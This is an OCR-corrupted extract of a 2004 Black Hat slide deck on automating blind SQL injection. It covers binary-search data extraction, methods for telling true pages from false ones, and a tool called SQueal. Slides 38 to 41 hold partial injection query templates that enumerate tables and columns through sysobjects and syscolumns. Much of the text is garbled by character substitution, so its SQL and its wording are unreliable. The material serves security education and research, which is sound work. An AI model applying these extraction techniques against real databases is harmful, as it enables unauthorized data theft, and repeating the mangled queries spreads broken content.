of 48
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
1/48
Blind SQL InjectionAutomation Techniques
Black Hat Briefings USA
2004Cameron [email protected]
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
2/48
What is SQ !n"ection#
$ Client s%&&lie' 'ata &asse' to ana&&lication (itho%t a&&ro&riate
'ata )ali'ation$ *rocesse' as comman's +, the
'ata+ase
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
3/48
-re%entl, Use' /o
$ *erform o&erations on the'ata+ase
$ B,&ass a%thentication mechanisms
$ 1ea' other(ise %na)aila+leinformation from the 'ata+ase
$ Write information s%ch as ne(%ser acco%nts to the 'ata+ase
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
4/48
/hree -orms of SQ !n"ection
$ /here are three main forms of SQ!n"ection %se' to rea' information
from a 'ata+ase1e'irection an' resha&ing a %er,
3rror message +ase'
Blin' !n"ection
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
5/48
Blin' SQ !n"ection
$ Blin' SQ !n"ection techni%es canincl%'e forming %eries res%lting in
+oolean )al%es an' inter&reting theo%t&%t H/5 &ages
$ SQ !n"ection can res%lt in significant'ata leakage an'6or 'ata mo'ification
attacks
$ Blin' attacks are essentiall, &la,ing 20%estions (ith the (e+ ser)er
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
6/48
Wh, foc%s on Blin'
!n"ections#$ Blin' in"ections are as common as
an, other in"ection
$ Blin' holes in)ol)e a false sense ofsec%rit, on the host
$ 1e%ires a larger in)estment of
time to exec%te man%al&enetration against
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
7/48
Benefits of an A%tomate' /ool
$ We can ask the ser)er as man, ,es6no%estions as (e (ant
$ -in'ing the first letter of a %sername(ith a +inar, search takes 7 re%ests
$ -in'ing the f%ll %sername if it8s characters takes :; re%ests
$ /o fin' the %sername is characterstakes ; re%ests
$ ;2 re%ests "%st to fin' the %sername
$ /his a''s %&
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
8/48
Benefits Cont8'
$ Ass%ming it takes
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
9/48
Benefits Cont8'
$ !f ,o% (ant non=tri)ial &enetration
/a+le names
Col%mn names
Act%al >ata
$ /his (o%l' take ho%rs or 'a,s or
longer 'e&en'ing on the si?e ofthe 'ata+ase
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
10/48
So%n' Sim&le#
An effecti)e tool is more com&lex than
a few shell scripts and netcat
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
11/48
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
12/48
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
13/48
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
14/48
Searching for !ntegers
$ Select a range %s%all, starting (ith 0
$ !ncrease )al%e ex&onentiall, +, a factor
of t(o %ntil %&&er limit is 'isco)ere'$ *artition half(a, +et(een %&&er limit
an' &re)io%s )al%e
$ Contin%e to hal)e sections %ntil one)al%e remains
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
15/48
*ro+lem
$ Ho( 'o (e recogni?e tr%e )s false &agesfrom the (e+ ser)er#
We take &attern recognition for grante' Can8t (e "%st 'o a string com&are#
$ D /he (hole &oint of a (e+ a&&lication is to
ha)e ',namic content
!t8s entirel, likel, that the section in'icatingthe tr%e6false is not the onl, ',namiccontent
String com&arison is s%ita+le for error
+ase' in"ection +%t not +lin' in"ection
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
16/48
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
17/48
Sol%tion ne Ee,(or'
Search$ 1e%ires 'irect inter)ention of the
%ser
$ User interaction re%ires effort to+e ex&en'e' (hich is (hat (e aretr,ing to minimi?e
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
18/48
Sol%tion /(o 5>: S%m
$ We+ A&&lications are 'esigne' to+e ',namic
$ 5>: ca%ses large o%t&%t changesfrom small in&%t changes
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
19/48
Foogle )s. Hoogle
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
20/48
5>: S%m Com&arison
$ 5>: 'oes not han'le changes (ell
$ 5a, (ork on some (e+
a&&lications +%t notcom&rehensi)e
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
21/48
Sol%tion /hree /ext
>ifference 3ngine$ /ext 'ifference tools are 'esigne'
to highlight informational changes
that (e are not concerne' (ith.$ A lot of effort is (aste' to retain
information that (ill sim&l, +e
'iscar'e'.
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
22/48
Sol%tion -o%r *arse H/5 /ree
$ 1e&resent text as html entities in a tree'ata str%ct%re
$ ook for 'ifferences in the sha&e of thetrees
$ !f onl, non=mark%& 'ata is changingthere (ill +e no (a, to &rocee' in
a%tomation$ 3asier to im&lement an xhtml &arser
than a realistic html &arser
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
23/48
Sol%tion -i)e inear
1e&resentation of ASC!!
S%mssmall in&%t )ariation G small o%t&%t
)ariation
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
24/48
Signat%re Com&arison
$ Fenerating +ase cases Will nee' +ase cases for com&arison of
%nkno(ns
We alrea', kno( g%arantee' tr%e6false&ages
We ha)e m%lti&le o&tions for kno(n +asecases
$ 3asiest is
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
25/48
Sam&le Signat%re Set
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
26/48
1ealistic Signat%re Set
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
27/48
/olerance Ban' Com&arison
$ 5inor changes in text%al contentres%lt in small o)erall changes in
s%m$ Changes still occ%r
$ Allo(ing for tolerance instea' of
exact com&arison in s%ms lessensfalse negati)es
| known unknown| / known
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
28/48
/olerance Ban' Com&arison
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
29/48
Shortcomings of /olerance
Ban' Com&arison$ !t (orks +%t there are a lot of
%nnecessar, com&arisons
$ >oesn8t take a')antage of kno(ngar+age 'ata
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
30/48
S%+tracti)e -ilter
$ We can i'entif, s%ms that are e%al +et(eenconflicting +ase cases
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
31/48
S%+tracti)e -ilter
$ /his can +e com+ine' (ith the tolerance +an'to eliminate %nnecessar, com&arisons
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
32/48
A'a&ti)e -ilter
$ Allo(s the a&&lication to +e&rofile' +efore testing against
%nkno(ns$ 1emo)es "%nk 'ata that co%l'
ske( res%lts
$ 1e%ires m%lti&le +ase cases
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
33/48
/(o !'enticalI Sam&les
< G
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
34/48
A'a&ti)e -ilter A&&lie'
< G
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
35/48
Benefits of A'a&ti)e -ilter
$ /olerance is mostl, %nnecessar, atthis &oint
$ 1emo)es most ',namic content%nrelate' to the 'ata leakage
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
36/48
SQ%ea
$ SQ%ea (as create' alongsi'e theresearch +eing &resente'
$ Written in CJ for Win'o(s K in%x Both Win'o(s.-orms K Ftk=Shar& FU!sa)aila+le
$ -ree for non=commercial %se
Black Hat Conference C>s incl%'e acommerciall, license' )ersion -ree for ,o%
$ 3x&orts 'ata to an L5 format for nice&resentation to clients6*HBs
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
37/48
SQ%ea 3x&orting >ata
$ SQ%ea %ses it8s o(n L5 format forsa)ing ex&loit 'ata
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
38/48
Fathering /a+le !nfo
We start (ith the !> n%m+er for each ta+le
... AND S)!)8* 89N*name; +9 sso&ects >))@tpe=cha#'6;; % search_value
... AND S)!)8* INi"; +9 sso&ects >))
i" %prev_table_idAND
@tpe=cha#'6;; % search_value
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
39/48
5ore /a+le !nfo
We can no( retrie)e each ta+le8srecogni?a+le name
... AND S)!)8* *9 1 !)Nname; +9 sso&ects
>)) i"= table_idAND
@tpe=cha#'6;; % search_value
... AND S)!)8* AS8IIS2S*IN(nameB
character_counterB1;; +9 sso&ects >))
i"=table_id; % search_value
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
40/48
Fathering -iel' !nformation
nce (e ha)e the ta+le information (ecan mo)e on to the fiel's
... AND S)!)8* 89N*name; +9 sscolumns
>)) i"=table_id; % search_value
... AND S)!)8* INcoli"; +9 sscolumns
>)) coli" %prev_colidAND i"=table_id;
% search_value
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
41/48
-iel' !nfo Cont8'
... AND S)!)8* *9 1 !)Nname; +9 sso&ects
>)) i"=table_id AND coli"=colid; % search_value
... AND S)!)8* AS8IIS2S*IN(nameBcharacter_counterB 1;; +9 sscolumns >))
i"=table_idAND coli"=colid; % search_value
... AND S)!)8* *9 1 @tpe; +9 sscolumns>)) i"=table_id AND coli"=colid; % search_value
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
42/48
-iel' >ata /,&es
Fathering fiel' 'ata t,&es is faster +%tre%ires kno(le'ge the t,&e ma&&ing
char2M9NarChar2Moesn8t lo(er the +arI for fin'ing
ex&loits$ /ro%+les (ith no carriage ret%rns 6
a%to generate' H/5
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
45/48
-orce' C1-
$ What ha&&ens (hen H/5 isgenerate' (itho%t carriage
ret%rns#at%ral ten'enc, to force carriage
ret%rns
/his (ill thro( off the 'ata$ At this &oint an H/5 &arser
(o%l' +e nee'e'
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
46/48
Concl%sion
$ Same techni%es can +e %tili?e' (ith %eries in'icatingin)ali' SQ
/reat these as %estions s%ch as !s this s,ntax
)ali'#I (hich in no( a ,es6no %estion$ 5>: Ba' for these &%r&oses
$ Same techni%es can +e %tili?e' in other a&&lications tointer&ret res%lts from H/5 res&onses
L*ath !n"ection
>A* !n"ection$ Use *arameteri?e' co'e in an a&&ro&riate fashion to
call store' &roce'%res
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
47/48
1eferences K S%ggeste'
*a&ersA')ance' SQ !n"ection in SQ Ser)er A&&lications
PChris Anle, FS S,stemshtt&66(((.nextgenss.com6&a&ers6a')ance'RslRin"ection.&'f
more A')ance' SQ !n"ection
PChris Anle, FS S,stemshtt&66(((.nextgenss.com6&a&ers6moreRa')ance'RslRin"ection.&'f
Blin' SQ !n"ection Are ,o%r (e+=a&&s N%lnera+le#PEe)in S&ett S*! >,namicshtt&66(((.s&i',namics.com6(hite&a&ers6Blin'RSQ!n"ection.&'f
8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf
48/48
Q%estions K Ans(ers
/his an' other tools are a)aila+lefor 'o(nloa' at
http://[email protected]#g/#eleases/